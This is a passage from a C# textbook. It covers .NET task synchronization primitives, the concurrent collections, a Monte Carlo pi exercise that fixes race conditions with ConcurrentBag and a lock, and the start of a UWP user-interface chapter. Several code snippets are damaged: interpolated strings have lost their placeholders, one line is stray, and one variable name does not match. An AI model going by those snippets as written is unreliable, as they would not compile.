by other tasks are blocked until the write lock has been obtained and
released.
Barrier With the Barrier class, you can temporarily halt the
execution of a set of tasks at a particular point in an application and
continue only when all tasks have reached this point. It is useful for
synchronizing tasks that need to perform a series of concurrent
operations in step with one another.
When a task creates a Barrier object, it specifies the number of tasks in
the set that will be synchronized. You can think of this value as a task
counter maintained internally inside the Barrier class. This value can be
amended later by calling the AddParticipant or RemoveParticipant
Download from finelybook [email protected]
864
method. When a task reaches a synchronization point, it calls the
SignalAndWait method of the Barrier object, which decrements the
thread counter inside the Barrier object. If this counter is greater than
zero, the task is blocked. Only when the counter reaches zero are all the
tasks waiting on the Barrier object released, and only then can they
continue running.
The Barrier class provides the ParticipantCount property, which
specifies the number of tasks that it synchronizes, and the
ParticipantsRemaining property, which indicates how many tasks need
to call SignalAndWait before the barrier is raised and blocked tasks can
continue running.
You can also specify a delegate in the Barrier constructor. This delegate
can refer to a method that runs when all the tasks have arrived at the
barrier. The Barrier object is passed in as a parameter to this method.
The barrier is not raised, and the tasks are not released until this method
completes.
Canceling synchronization
The ManualResetEventSlim, SemaphoreSlim, CountdownEvent, and Barrier
classes all support cancellation by following the cancellation model described
in Chapter 23. The wait operations for each of these classes can take an
optional CancellationToken parameter, retrieved from a
CancellationTokenSource object. If you call the Cancel method of the
CancellationTokenSource object, each wait operation referencing a
CancellationToken generated from this source is aborted with an
OperationCanceledException exception (possibly wrapped in an
AggregateException exception, depending on the context of the wait
operation).
The following code shows how to invoke the Wait method of a
SemaphoreSlim object and specify a cancellation token. If the wait operation
is canceled, the OperationCanceledException catch handler runs.
Click here to view code image
CancellationTokenSource cancellationTokenSource = new
CancellationTokenSource();
Download from finelybook [email protected]
865
CancellationToken cancellationToken = cancellationTokenSource.Token;
...
// Semaphore that protects a pool of 3 resources
SemaphoreSlim semaphoreSlim = new SemaphoreSlim(3);
...
// Wait on the semaphore, and catch the OperationCanceledException if
// another thread calls Cancel on cancellationTokenSource
try
{
semaphoreSlim.Wait(cancellationToken);
}
catch (OperationCanceledException e)
{
...
}
The concurrent collection classes
A common requirement of many multithreaded applications is to store and
retrieve data in a collection. The standard collection classes provided with the
.NET Framework are not thread-safe by default, although you can use the
synchronization primitives described in the previous section to wrap code
that adds, queries, and removes elements in a collection. However, this
process is potentially prone to error and not very scalable, so the .NET
Framework class library includes a small set of thread-safe collection classes
and interfaces in the System.Collections.Concurrent namespace that is
designed specifically for use with tasks. The following list briefly
summarizes the key types in this namespace:
ConcurrentBag<T> This is a general-purpose class for holding an
unordered collection of items. It includes methods to insert (Add),
remove (TryTake), and examine (TryPeek) items in the collection.
These methods are thread safe. The collection is also enumerable, so
you can iterate over its contents by using a foreach statement.
ConcurrentDictionary<TKey, TValue> This class implements a
thread-safe version of the generic Dictionary<TKey, TValue>
collection class described in Chapter 18, “Using collections.” It
provides the methods TryAdd, ContainsKey, TryGetValue,
TryRemove, and TryUpdate, which you can use to add, query, remove,
and modify items in the dictionary.
ConcurrentQueue<T> This class provides a thread-safe version of the
Download from finelybook [email protected]
866
generic Queue<T> class described in Chapter 18. It includes the
methods Enqueue, TryDequeue, and TryPeek, which you can use to
add, remove, and query items in the queue.
ConcurrentStack<T> This is a thread-safe implementation of the
generic Stack<T> class, also described in Chapter 18. It provides
methods such as Push, TryPop, and TryPeek, which you can use to
push, pop, and query items on the stack.
Note Adding thread safety to the methods in a collection class imposes
additional run-time overhead, so these classes are not as fast as the
regular collection classes. You need to keep this fact in mind when
deciding whether to parallelize a set of operations that require access to
a shared collection.
Using a concurrent collection and a lock to implement
thread-safe data access
In the following set of exercises, you will implement an application that
calculates pi by using a geometric approximation. Initially, you will perform
the calculation in a single-threaded manner, and then you will change the
code to perform the calculation by using parallel tasks. In the process, you
will uncover some data synchronization issues that you need to address and
that you will solve by using a concurrent collection class and a lock to ensure
that the tasks coordinate their activities correctly.
The algorithm that you will implement calculates pi based on some simple
mathematics and statistical sampling. If you draw a circle of radius r and
draw a square with sides that touch the circle, the sides of the square are 2 * r
in length, as shown in the following image:
Download from finelybook [email protected]
867
You can calculate the area of the square, S, like this
S = (2 * r) * (2 * r)
or
S = 4 * r * r
The area of the circle, C, is calculated as follows:
C = pi * r * r
Rearranging these formulas, you can see that
r * r = C / pi
and
r * r = S / 4
Combining these equations, you get:
S / 4 = C / pi
And therefore:
Download from finelybook [email protected]
868
pi = 4 * C / S
The trick is to determine the value of the ratio of the area of the circle, C,
with respect to the area of the square, S. This is where the statistical sampling
comes in. You can generate a set of random points that lie within the square
and count how many of these points also fall within the circle. If you generate
a sufficiently large and random sample, the ratio of points that lie within the
circle to the points that lie within the square (and also in the circle)
approximates the ratio of the areas of the two shapes, C / S. All you have to
do is count them.
How do you determine whether a point lies within the circle? To help
visualize the solution, draw the square on a piece of graph paper with the
center of the square at the origin, point (0,0). You can then generate pairs of
values, or coordinates, that lie within the range (–r, –r) to (+r, +r). You can
determine whether any set of coordinates (x, y) lie within the circle by
applying Pythagoras’ theorem to determine the distance d of these
coordinates from the origin. You can calculate d as the square root of ((x * x)
+ (y * y)). If d is less than or equal to r, the radius of the circle, the
coordinates (x, y) specify a point within the circle, as shown in the following
diagram:
Download from finelybook [email protected]
869
You can simplify matters further by generating coordinates that lie only in
the upper-right quadrant of the graph so that you only have to generate pairs
of random numbers between 0 and r. This is the approach you will take in the
exercises.
Note The exercises in this chapter are intended to be run on a computer
with a multicore processor. If you have only a single-core CPU, you
will not observe the same effects. Also, you should not start any
additional programs or services between exercises, because these might
affect the results you see.
Calculate pi by using a single thread
1. Start Visual Studio 2017 if it is not already running.
2. Open the CalculatePI solution, which is located in the \Microsoft
Download from finelybook [email protected]
870
Press\VCSBS\Chapter 24\ CalculatePI folder in your Documents folder.
3. In Solution Explorer, in the CalculatePI project, double-click Program.cs
to display the file in the Code and Text Editor window.
This is a console application. The skeleton structure of the application
has already been created for you.
4. Scroll to the bottom of the file and examine the Main method. It looks
like this:
Click here to view code image
static void Main(string[] args)
{
double pi = SerialPI();
Console.WriteLine($"Geometric approximation of PI calculated
serially: ");
Console.WriteLine();
// pi = ParallelPI();
// Console.WriteLine($"Geometric approximation of PI
calculated in parallel: ");
}
This code calls the SerialPI method, which calculates pi by using the
geometric algorithm described before this exercise. The value is returned
as a double and displayed. The code that is currently commented out
calls the ParallelPI method, which performs the same calculation but by
using concurrent tasks. The result displayed should be the same as that
returned by the SerialPI method.
5. Examine the SerialPI method.
Click here to view code image
static double SerialPI()
{
List<double> pointsList = new List<double>();
Random random = new Random(SEED);
int numPointsInCircle = 0;
Stopwatch timer = new Stopwatch();
timer.Start();
try
{
// TO DO: Implement the geometric approximation of PI
return 0;
}
finally
Download from finelybook [email protected]
871
{
long milliseconds = timer.ElapsedMilliseconds;
Console.WriteLine($"SerialPI complete: Duration: ms",);
Console.WriteLine(
$"Points in pointsList: {pointsList.Count}. Points
within circle: ");
{numPointsInCircle}");
}
}
This method generates a large set of coordinates and calculates the
distances of each set of coordinates from the origin. The size of the set is
specified by the constant NUMPOINTS at the top of the Program class.
The bigger this value is, the greater the set of coordinates and the more
accurate the value of pi calculated by this method. If your computer has
sufficient memory, you can increase the value of NUMPOINTS.
Similarly, if you find that the application throws
OutOfMemoryException exceptions when you run it, you can reduce this
value.
You store the distance of each point from the origin in the pointsList
List<double> collection. The data for the coordinates is generated by
using the random variable. This is a Random object, seeded with a
constant to generate the same set of random numbers each time you run
the program. (This helps you determine that it is running correctly.) You
can change the SEED constant at the top of the Program class if you
want to seed the random number generator with a different value.
You use the numPointsInCircle variable to count the number of points in
the pointsList collection that lie within the bounds of the circle. The
radius of the circle is specified by the RADIUS constant at the top of the
Program class.
To help you compare performance between this method and the
ParallelPI method, the code creates a Stopwatch variable called timer
and starts it running. The finally block determines how long the
calculation took and displays the result. For reasons that will be
described later, the finally block also displays the number of items in the
pointsList collection and the number of points that it found that lie
within the circle.
You will add the code that actually performs the calculation to the try
Download from finelybook [email protected]
872
block in the next few steps.
6. In the try block, delete the comment and remove the return statement.
(This statement was provided only to ensure that the code compiles.)
Add to the try block the for block and statements shown in bold in the
following code:
Click here to view code image
try
{
for (int points = 0; points < NUMPOINTS; points++)
{
int xCoord = random.Next(RADIUS);
int yCoord = random.Next(RADIUS);
double distanceFromOrigin = Math.Sqrt(xCoord * xCoord +
yCoord * yCoord);
pointsList.Add(distanceFromOrigin);
doAdditionalProcessing();
}
}
This block of code generates a pair of coordinate values that lie in the
range 0 to RADIUS, and it stores them in the xCoord and yCoord
variables. The code then employs Pythagoras’s theorem to calculate the
distance of these coordinates from the origin and adds the result to the
pointsList collection.
Note Although there is a little bit of computational work
performed by this block of code, in a real-world scientific
application you are likely to include far more complex calculations
that will keep the processor occupied for longer. To simulate this
situation, this block of code calls another method,
doAdditionalProcessing. All this method does is occupy a number
of CPU cycles as shown in the following code sample. I opted to
follow this approach to better demonstrate the data synchronization
requirements of multiple tasks rather than have you write an
application that performs a highly complex calculation such as a
fast Fourier transform (FFT) to keep the CPU busy:
Download from finelybook [email protected]
873
Click here to view code image
private static void doAdditionalProcessing()
{
Thread.SpinWait(SPINWAITS);
}
SPINWAITS is another constant defined at the top of the
Program class.
7. In the SerialPI method, in the try block, after the for block, add the
foreach statement shown in bold in the following example.
Click here to view code image
try
{
for (int points = 0; points < NUMPOINTS; points++)
{
...
}
foreach (double datum in pointsList)
{
if (datum <= RADIUS)
{
numPointsInCircle++;
}
}
}
This code iterates through the pointsList collection and examines each
value in turn. If the value is less than or equal to the radius of the circle,
it increments the numPointsInCircle variable. At the end of this loop,
numPointsInCircle should contain the total number of coordinates that
were found to lie within the bounds of the circle.
8. After the foreach statement, add to the try block the following
statements shown in bold:
Click here to view code image
try
{
for (int points = 0; points < NUMPOINTS; points++)
{
Download from finelybook [email protected]
874
...
}
foreach (double datum in pointsList)
{
...
}
double pi = 4.0 * numPointsInCircle / NUMPOINTS;
return pi;
}
The first statement calculates pi based on the ratio of the number of
points that lie within the circle to the total number of points, using the
formula described earlier. The value is returned as the result of the
method.
9. On the Debug menu, click Start Without Debugging.
The program runs and displays its approximation of PI, as shown in the
following image. (It took just nearly 40 seconds on my computer, so be
prepared to wait for a little while.) The time taken to calculate the result
also appears.
Note Apart from the timing, your result should be the same as that
shown, 3.1414888, unless you have changed the NUMPOINTS,
RADIUS, or SEED constants.
10. Close the console window, and return to Visual Studio.
In the SerialPI method, the code in the for loop that generates the points
Download from finelybook [email protected]
875
and calculates their distance from the origin is an obvious area that can be
parallelized. This is what you will do in the next exercise.
Calculate pi by using parallel tasks
1. In Solution Explorer, double-click Program.cs to display the file in the
Code and Text Editor window if it is not already open.
2. Locate the ParallelPI method. It contains the same code as the initial
version of the SerialPI method before you added the code to the try
block to calculate pi.
3. In the try block, delete the comment and remove the return statement.
Add the Parallel.For statement shown here in bold to the try block:
Click here to view code image
try
{
Parallel.For (0, NUMPOINTS, (x) =>
{
int xCoord = random.Next(RADIUS);
int yCoord = random.Next(RADIUS);
double distanceFromOrigin = Math.Sqrt(xCoord * xCoord +
yCoord * yCoord);
pointsList.Add(distanceFromOrigin);
doAdditionalProcessing();
});
}
This construct is the parallel analog of the code in the for loop in the
SerialPI method. The body of the original for loop is wrapped in a
lambda expression. Remember that each iteration of the loop is
performed by using a task, and tasks can run in parallel. The degree of
parallelism depends on the number of processor cores and other
resources available on your computer.
4. Add the following code shown in bold to the try block, after the
Parallel.For statement. This code is the same as the corresponding
statements in the SerialPI method.
Click here to view code image
try
{
Parallel.For (...
Download from finelybook [email protected]
876
{
...
});
foreach (double datum in pointsList)
{
if (datum <= RADIUS)
{
numPointsInCircle++;
}
}
double pi = 4.0 * numPointsInCircle / NUMPOINTS;
return pi;
}
5. In the Main method near the end of the Program.cs file, uncomment the
code that calls the ParallelPI method and the Console.WriteLine
statement that displays the results.
6. On the Debug menu, click Start Without Debugging.
The program runs. The following image shows the typical output (your
timings might be different; I was using a quad-core processor):
The value calculated by the SerialPI method should be exactly as
before, but the result of the ParallelPI method, 3.9638868, actually
looks a little suspect. The random number generator is seeded with the
same value as that used by the SerialPI method, so it should produce the
same sequence of random numbers with the same result and the same
number of points within the circle. Moreover, if you run the application
again you should get the same value of PI for the SerialPI method, but
the value calculated by the ParallelPI method is likely to be different
(and still inaccurate). Another curious point is that the pointsList
Download from finelybook [email protected]
877
collection in the ParallelPI method seems to contain fewer points than
the same collection in the SerialPI method.
Note If the pointsList collection actually contains the expected
number of items, run the application again. You should find that it
contains fewer items than expected in most (but not necessarily all)
runs.
7. Close the console window, and return to Visual Studio.
What went wrong with the parallel calculation? A good place to start is
the number of items in the pointsList collection. This collection is a generic
List<double> object. However, this type is not thread-safe. The code in the
Parallel.For statement calls the Add method to append a value to the
collection, but remember that this code is being executed by tasks running as
concurrent threads. Consequently, given the number of items being added to
the collection, it is highly probable that some of the calls to Add will interfere
with one another and cause some corruption. A solution is to use one of the
collections from the System.Collections.Concurrent namespace because these
collections are thread safe. The generic ConcurrentBag<T> class in this
namespace is probably the most suitable collection to use for this example.
Use a thread-safe collection
1. In Solution Explorer, double-click Program.cs to display the file in the
Code and Text Editor window if it is not already open.
2. Add the following using directive to the list at the top of the file:
using System.Collections.Concurrent;
3. Locate the ParallelPI method. At the start of this method, replace the
statement that instantiates the List<double> collection with code that
creates a ConcurrentBag<double> collection instead, as shown in bold
in the following code example:
Click here to view code image
Download from finelybook [email protected]
878
static double ParallelPI()
{
ConcurrentBag<double> pointsList = new ConcurrentBag<double>
();
Random random = ...;
...
}
Notice that you cannot specify a default capacity for this class, so the
constructor does not take a parameter.
You do not need to change any other code in this method; you add an
item to a ConcurrentBag<T> collection by using the Add method,
which is the same mechanism that you use to add an item to a List<T>
collection.
4. On the Debug menu, click Start Without Debugging.
The program runs and displays its approximation of PI by using the
SerialPI and ParallelPI methods. The following image shows the
typical output.
This time, the pointsList collection in the ParallelPI method contains the
correct number of points, but the number of points within the circle,
9989364, appears to be very high; it should be the same as that reported
by the SerialPI method.
You should also note that the time taken by the ParallelPI method has
increased compared with the previous exercise. This is because the
methods in the ConcurrentBag<T> class have to lock and unlock data to
guarantee thread safety, and this process adds to the overhead of calling
these methods. Keep this point in mind when you’re considering
whether it is appropriate to parallelize an operation.
Download from finelybook [email protected]
879
5. Close the console window, and return to Visual Studio.
You currently have the correct number of points in the pointsList
collection, but the value recorded for each of these points is now
questionable. The code in the Parallel.For construct calls the Next method of
a Random object, but like the methods in the generic List<T> class, this
method is not thread-safe. Sadly, there is no concurrent version of the
Random class, so you must resort to using an alternative technique to
serialize calls to the Next method. Because each invocation is relatively brief,
it makes sense to use a simple lock to guard calls to this method.
Use a lock to serialize method calls
1. In Solution Explorer, double-click Program.cs to display the file in the
Code and Text Editor window if it is not already open.
2. Locate the ParallelPI method. Modify the code in the lambda
expression in the Parallel.For statement to protect the calls to
random.Next by using a lock statement. Specify the pointsList collection
as the subject of the lock, as shown here in bold:
Click here to view code image
static double ParallelPI()
{
...
Parallel.For(0, NUMPOINTS, (x) =>
{
int xCoord;
int yCoord;
lock(pointsList)
{
xCoord = random.Next(RADIUS);
yCoord = random.Next(RADIUS);
}
double distanceFromOrigin = Math.Sqrt(xCoord * xCoord +
yCoord * yCoord);
pointsList.Add(distanceFromOrigin);
doAdditionalProcessing();
});
...
}
Notice that the xCoord and yCoord variables are declared outside the
Download from finelybook [email protected]
880
lock statement. You do this because the lock statement defines its own
scope, and any variables defined within the block specifying the scope
of the lock statement disappear when the construct exits.
3. On the Debug menu, click Start Without Debugging.
This time, the values of pi calculated by the SerialPI and ParallelPI
methods are the same. The only difference is that the ParallelPI method
runs more much more quickly.
4. Close the console window, and return to Visual Studio.
Summary
In this chapter, you saw how to define asynchronous methods by using the
async modifier and the await operator. Asynchronous methods are based on
tasks, and the await operator specifies the points at which a task can be used
to perform asynchronous processing.
You also learned a little about PLINQ and how you can use the AsParallel
extension method to parallelize some LINQ queries. However, PLINQ is a
big subject in its own right, and this chapter has only shown you how to get
started. For more information, see the topic “Parallel LINQ (PLINQ)” in the
documentation provided with Visual Studio.
This chapter also showed you how to synchronize data access in
concurrent tasks by using the synchronization primitives provided for use
with tasks. You saw how to use the concurrent collection classes to maintain
collections of data in a thread-safe manner.
If you want to continue to the next chapter, keep Visual Studio 2017
Download from finelybook [email protected]
881
running and turn to Chapter 25, “Implementing the user interface for a
Universal Windows Platform app.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Implement an
asynchronous
method
Define the method with the async modifier and change the
type of the method to return a Task (or a void). In the body
of the method, use the await operator to specify points at
which asynchronous processing can be performed. For
example:
Click here to view code image
private async Task<int> calculateValueAsync(...)
{
// Invoke calculateValue using a Task
Task<int> generateResultTask =
Task.Run(() => calculateValue(...));
await generateResultTask;
return generateResultTask.Result;
}
Parallelize a
LINQ query
Specify the AsParallel extension method with the data
source in the query. For example:
Click here to view code image
var over100 = from n in numbers.AsParallel()
where ...
select n;
Enable
cancellation in
a PLINQ
query
Use the WithCancellation method of the ParallelQuery
class in the PLINQ query and specify a cancellation token.
For example:
Click here to view code image
CancellationToken tok = ...;
...
var orderInfoQuery =
from c in CustomersInMemory.Customers.
AsParallel().WithCancellation(tok)
Download from finelybook [email protected]
882
join o in OrdersInMemory.Orders.AsParallel()
on ...
Synchronize
one or more
tasks to
implement
thread-safe
exclusive
access to
shared data
Use the lock statement to guarantee exclusive access to the
data. For example:
Click here to view code image
object myLockObject = new object();
...
lock (myLockObject)
{
// Code that requires exclusive access
// to a shared resource
...
}
Synchronize
threads and
make them
wait for an
event
Use a ManualResetEventSlim object to synchronize an
indeterminate number of threads.
Use a CountdownEvent object to wait for an event to be
signaled a specified number of times.
Use a Barrier object to coordinate a specified number of
threads and synchronize them at a particular point in an
operation.
Synchronize
access to a
shared pool of
resources
Use a SemaphoreSlim object. Specify the number of items
in the pool in the constructor. Call the Wait method prior to
accessing a resource in the shared pool. Call the Release
method when you have finished with the resource. For
example:
Click here to view code image
SemaphoreSlim semaphore = new SemaphoreSlim(3);
...
semaphore.Wait();
// Access a resource from the pool
...
semaphore.Release();
Provide
exclusive
write access to
a resource but
shared read
access
Use a ReaderWriterLockSlim object. Prior to reading the
shared resource, call the EnterReadLock method. Call the
ExitReadLock method when you have finished. Before
writing to the shared resource, call the EnterWriteLock
method. Call the ExitWriteLock method when you have
completed the write operation. For example:
Download from finelybook [email protected]
883
Click here to view code image
ReaderWriterLockSlim readerWriterLock = new
ReaderWriterLockSlim();
Task readerTask = Task.Factory.StartNew(() =>
{
readerWriterLock.EnterReadLock();
// Read shared resource
readerWriterLock.ExitReadLock();
});
Task writerTask = Task.Factory.StartNew(() =>
{
readerWriterLock.EnterWriteLock();
// Write to shared resource
readerWriterLock.ExitWriteLock();
});
Cancel a
blocking wait
operation
Create a cancellation token from a
CancellationTokenSource object, and specify this token as
a parameter to the wait operation. To cancel the wait
operation, call the Cancel method of the
CancellationTokenSource object. For example:
Click here to view code image
CancellationTokenSource cancellationTokenSource = new
CancellationTokenSource();
CancellationToken cancellationToken =
cancellationTokenSource.Token;
...
// Semaphore that protects a pool of 3 resources
SemaphoreSlim semaphoreSlim = new SemaphoreSlim(3);
...
// Wait on the semaphore, and throw an
// OperationCanceledException if
// another thread calls Cancel on
// cancellationTokenSource
semaphore.Wait(cancellationToken);
Download from finelybook [email protected]
884
CHAPTER 25
Implementing the user interface for
a Universal Windows Platform app
After completing the chapter, you will be able to:
Describe the features of a typical Universal Windows Platform app.
Implement a scalable user interface for a Universal Windows Platform
app that can adapt to different form factors and device orientations.
Create and apply styles to a Universal Windows Platform app.
Recent versions of Windows have introduced a platform for building and
running highly interactive applications with continuously connected, touch-
driven user interfaces and support for embedded device sensors. An updated
application security and life-cycle model changed the way that users and
applications work together. This platform is called the Windows Runtime
(WinRT), and I have referred to it occasionally throughout this book. You
can use Visual Studio to build WinRT applications that can adapt themselves
to a variety of device form factors, ranging from handheld tablets to desktop
PCs with large, high-resolution screens. Using Windows 8 and Visual Studio
2013, you could also publish these applications in the Windows Store as
Windows Store apps.
Separately, you could use the Windows Phone SDK 8.0 (integrated into
Visual Studio) to design and implement applications that run on Windows
Phone 8 devices. These applications share many similarities with their tablet
and desktop-oriented siblings, but they operate in a more restricted
environment, typically with fewer resources and a requirement to support a
Download from finelybook [email protected]
885
different user interface layout. Consequently, Windows Phone 8 applications
use a different version of the WinRT, called the Windows Phone Runtime,
and you can market Windows Phone 8 applications as Windows Phone Store
apps. You could create a class library with which to share application and
business logic between a Windows tablet/desktop application and a Windows
Phone 8 application by using the Portable Class Library template in Visual
Studio, but Windows Store apps and Windows Phone Store apps are distinct
beasts with differences in the features that they can make available.
Subsequently, Microsoft sought to converge these platforms and reduce
the number of differences. This strategy has culminated in Windows 10 with
Universal Windows Platform apps. A Universal Windows Platform app uses
an amended version of WinRT called the Universal Windows Platform
(UWP). Using the UWP, you can build applications that will run on the
widest range of Windows 10 devices without the need to maintain separate
code bases. In addition to many phones, tablets, and desktop computers,
UWP is also available on Xbox.
Note The UWP defines a core set of features and functionality. The
UWP divides devices into device families: the desktop device family,
the mobile device family, the Xbox device family, and so on. Each
device family defines the set of APIs and devices on which those APIs
are implemented. Additionally, the Universal device family defines a
core set of features and functionality that is available across all device
families. The libraries available for each device family include
conditional methods that enable an app to test on which device family it
is currently running.
The purpose of this chapter is to provide a brief description of the
concepts that underpin the UWP and to help you get started using Visual
Studio 2017 to build apps that operate in this environment. In this chapter,
you will learn about some of the features and tools included with Visual
Studio 2017 for building UWP apps, and you will construct an app that
conforms to the Windows 10 look and feel. You will concentrate on learning
Download from finelybook [email protected]
886
how to implement a user interface (UI) that scales and adapts to different
device resolutions and form factors, and how to apply styling to give the app
a distinctive look and feel. Subsequent chapters will focus on the
functionality and other features of the app.
Note There is not enough space in a book such as this to provide a
comprehensive treatise on building UWP apps. Rather, these final
chapters concentrate on the basic principles of building an interactive
app that uses the Windows 10 UI. For detailed information on writing
UWP apps, visit the “Guide to Universal Windows Platform (UWP)
apps” page on the Microsoft website at
https://msdn.microsoft.com/library/dn894631.aspx.
Features of a Universal Windows Platform app
Many modern handheld and tablet devices make it possible for users to
interact with apps by using touch. You should design your UWP apps based
on this style of user experience (UX). Windows 10 includes an extensive
collection of touch-based controls that also work with a mouse and keyboard.
You don’t need to separate the touch and mouse features in your apps; simply
design your apps for touch, and users can still operate them by using the
mouse and keyboard if they prefer or when they are using a device that does
not support touch interaction.
The way in which the graphical user interface (GUI) responds to gestures
to provide feedback to the user can greatly enhance the professional feel of
your apps. The UWP app templates included with Visual Studio 2017 include
an animation library that you can use in your apps to standardize this
feedback and blend in seamlessly with the operating system and software that
Microsoft provides.
Download from finelybook [email protected]
887
Note The term gesture refers to the manual touch-oriented operations
that a user can perform. For example, a user can tap an item with a
finger, and this gesture typically responds in the same way that you
would expect a mouse click to behave. However, gestures can be far
more expressive than the simple operations that can be captured by
using a mouse. For example, the rotate gesture involves the user placing
two fingers on the screen and tracing the arc of a circle with them; in a
typical Windows 10 app, this gesture should cause the UI to rotate the
selected object in the direction indicated by the movement of the user’s
fingers. Other gestures include pinching to zoom in on an item to
display more detail, pressing and holding to reveal more information
about an item (similar to right-clicking the mouse click), and sliding to
select an item and drag it across the screen.
The UWP is intended to run on a wide range of devices with varying
screen sizes and resolutions. Therefore, when you implement a UWP app,
you need to construct your software so that it adapts to the environment in
which it is running, scaling automatically to the screen size and orientation of
the device. This approach opens your software to an increasingly broad
market. Additionally, many modern devices can also detect their orientation
and the speed at which the user changes this orientation through the use of
built-in sensors and accelerometers. UWP apps can adapt their layout as the
user tilts or rotates a device, making it possible for the user to work in a mode
that is most comfortable for that individual. You should also understand that
mobility is a key requirement for many modern apps, and with UWP apps,
users can roam and their data can migrate through the cloud to whatever
device they happen to be running your app on at a particular moment.
The lifetime of a UWP app is somewhat different from that of a traditional
desktop app. You should design apps that can run on devices such as
smartphones to suspend execution when the user switches focus to another
app and then to resume running when the focus returns. This approach can
help to conserve resources and battery life on a constrained device. Windows
might actually decide to close a suspended app if it determines that it needs to
Download from finelybook [email protected]
888
release system resources such as memory. When the app next runs, it should
be able to resume where it left off. This means that you need to be prepared
to manage app state information in your code, save it to hard disk, and restore
it at the appropriate juncture.
Note You can find more information about how to manage the life cycle
of a UWP app at the page “Guidelines for app suspend and resume” on
the Microsoft website at
https://msdn.microsoft.com/library/windows/apps/hh465088.aspx.
When you build a new UWP app, you can package it by using the tools
provided with Visual Studio 2017 and upload it to the Windows Store. Other
users can then connect to the Store, download your app, and install it. You
can charge a fee for your apps, or you can make them available at no cost.
This distribution and deployment mechanism depends on your apps being
trustworthy and conforming to security policies specified by Microsoft.
When you upload an app to the Windows Store, it undergoes a number of
checks to verify that it does not contain malicious code and that it conforms
to the security requirements of a UWP app. These security constraints dictate
how your app accesses resources on the computer on which it is installed. For
example, by default, a UWP app cannot write directly to the file system or
listen for incoming requests from the network (two of the behaviors
commonly exhibited by viruses and other malware). However, if your app
needs to perform restricted operations, you can specify them as capabilities in
the app’s manifest data held in the Package.appxmanifest file. This
information is recorded in the metadata of your app and signals Microsoft to
perform additional tests to verify the way in which your app uses these
features.
The Package.appxmanifest file is an XML document, but you can edit it in
Visual Studio by using the Manifest Designer. The following image shows an
example. Here, the Capabilities tab is being used to specify the restricted
operations that the application can perform.
Download from finelybook [email protected]
889
In this example, the application declares that it needs to:
Receive incoming data from the Internet but cannot act as a server and
has no local network access.
Access GPS information that provides information about the location
of the device.
Read and write files held in the user’s Pictures folder.
The user is made aware of these requirements, and in all cases, the user
can disable the settings after installing the app; the application must detect
when this has occurred and be prepared to fall back to an alternative solution
or disable the functionality that requires these features.
Note You can find more information about the capabilities that UWP
apps support on the “App capability declarations” page on the Microsoft
Download from finelybook [email protected]
890
website at
http://msdn.microsoft.com/library/windows/apps/hh464936.aspx.
Enough theory; let’s get started building a UWP app.
Using the Blank App template to build a Universal
Windows Platform app
The simplest way to build a UWP app is to use the UWP app templates
included with Visual Studio 2017 on Windows 10. Many of the GUI-based
applications implemented in earlier chapters have made use of the Blank App
template, and this is a good place to start.
In the following exercises, you will design the user interface for a simple
app for a fictitious company called Adventure Works. This company
manufactures and supplies bicycles and associated paraphernalia. The app
will enable a user to enter and modify the details of Adventure Works’s
customers.
Create the Adventure Works Customers app
1. Start Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
3. In the New Project dialog box, in the left pane, expand Visual C#, and
then click Windows Universal.
4. In the middle pane, click the Blank App (Universal Windows) icon.
5. In the Name field, type Customers.
6. In the Location field, type \Microsoft Press\VCSBS\Chapter
25 in your Documents folder.
7. Click OK.
8. In the New Universal Windows Project dialog box, accept the default
values for the Target Version and Minimum Version drop-down list
boxes, and then click OK.
Download from finelybook [email protected]
891
The new app is created, and the Overview page is displayed. This page
contains links to information that you can use to start creating,
configuring, and deploying Universal Windows apps.
9. In Solution Explorer, double-click MainPage.xaml.
The Design View window appears and displays a blank page. You can
drag controls from the Toolbox to add the various controls required by
the app, as demonstrated in Chapter 1, “Welcome to C#.” However, for
this exercise, it is more instructive to concentrate on the XAML markup
that defines the layout for the form. If you examine this markup, it
should look like this:
Click here to view code image
<Page
x:Class="Customers.MainPage"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Customers"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-
compatibility/2006"
Download from finelybook [email protected]
892
mc:Ignorable="d">
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
</Grid>
</Page>
The form starts with the XAML <Page> tag and finishes with a closing
</Page> tag. Everything between these tags defines the content of the
page.
The attributes of the <Page> tag contain a number of declarations of the
form xmlns:id = “…”. These are XAML namespace declarations, and
they operate similarly to C# using directives since they bring items into
scope. Many of the controls and other items that you can add to a page
are defined in these XAML namespaces, and you can ignore most of
these declarations. However, there is one rather curious-looking
declaration to which you should pay attention:
xmlns:local="using:Customers"
This declaration brings the items in the C# Customers namespace into
scope. You can reference classes and other types in this namespace in
your XAML code by prefixing them with local. The Customers
namespace is the namespace generated for the code in your app.
10. In Solution Explorer, expand MainPage.xaml, and then double-click
MainPage.xaml.cs to display it in the Code and Text Editor window.
11. Remember from the exercises earlier in this book that this is the C# file
that contains the app logic and event handlers for the form. It looks like
this (the using directives at the top of the file have been omitted to save
space):
Click here to view code image
// The Blank Page item template is documented at
http://go.microsoft.com/fwlink/?LinkId=402352&clcid=0x409
namespace Customers
{
/// <summary>
/// An empty page that can be used on its own or navigated
to within a Frame.
/// </summary>
public sealed partial class MainPage : Page
{
Download from finelybook [email protected]
893
public MainPage()
{
this.InitializeComponent();
}
}
}
This file defines the types in the Customers namespace. The page is
implemented by a class called MainPage, and it inherits from the Page
class. The Page class implements the default functionality of an XAML
page for a UWP app, so all you have to do is write the code that defines
the logic specific to your app in the MainPage class.
12. Return to the MainPage.xaml file in the Design View window. If you
look at the XAML markup for the page, you should notice that the
<Page> tag includes the following attribute:
x:Class="Customers.MainPage"
This attribute connects the XAML markup that defines the layout of the
page to the MainPage class that provides the logic behind the page.
That’s the basic plumbing of a simple UWP app. Of course, what makes a
graphical app valuable is the way in which it presents information to a user.
This is not always as simple as it sounds. Designing an attractive and easy-to-
use graphical interface requires specialist skills that not all developers have (I
know, because I lack them myself). However, many graphic artists who do
have these skills are not programmers, so although they might be able to
design a wonderful user interface, they might not be able to implement the
logic required to make it useful. Fortunately, Visual Studio 2017 makes it
possible for you to separate the user interface design from the business logic
so that a graphic artist and a developer can cooperate to build a really cool-
looking app that also works well. All a developer has to do is concentrate on
the basic layout of the app and let a graphic artist provide the styling.
